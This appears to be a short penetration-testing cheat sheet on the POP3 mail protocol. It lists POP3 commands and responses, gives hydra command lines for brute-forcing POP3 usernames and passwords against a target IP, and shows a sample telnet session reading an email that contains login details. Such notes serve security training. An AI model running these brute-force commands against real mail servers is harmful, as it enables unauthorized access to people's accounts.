Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
POP3 BASICS
- Purpose: An application layer protocol used for retrieving email messages from a mail server.
- Port: Operates on TCP port 110.
- Model: Follows a client-server model, where the client connects to the mail server to retrieve emails.
POP3 COMMANDS
- USER: Identifies the username or email address of the client.
- PASS: Provides the password for authentication.
- LIST: Retrieves a list of all emails on the server, along with their sizes.
- RETR: Retrieves a specific email from the server based on its index.
- DELE: Marks a specific email for deletion on the server.
- NOOP: No operation command, used to keep the connection alive.
- QUIT: Terminates the POP3 session and closes the connection.
BRUTE-FORCING POP3 CREDENTIALS
- Unknown User
hydra -L user.txt -p "Password" -f [TARGET-IP] pop3
- Unknown Password
hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] pop3
- Unknown User and Password
hydra -L user.txt -P /opt/rockyou.txt -f [TARGET-IP] pop3
- Different Port
hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] pop3 -s 9999
POP3 RESPONSES
- +OK: Indicates a successful response from the server.
- -ERR: Indicates an error response from the server.
EXAMPLE
hackfast@kali:~$ telnet [IP-ADRESS] 110
+OK alpha POP3 service (JAMES POP3 Server 2.3.2) active
USER mrrobot
+OK
PASS secretpassword
+OK Welcome mrrobot
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Retrieving message
From: mrrobot@hackfa.st
Hello Mr. Robot,
Below is your remote desktop login info. Please remember it!
username: mrrobot
password: S3cur3P@ssw0rd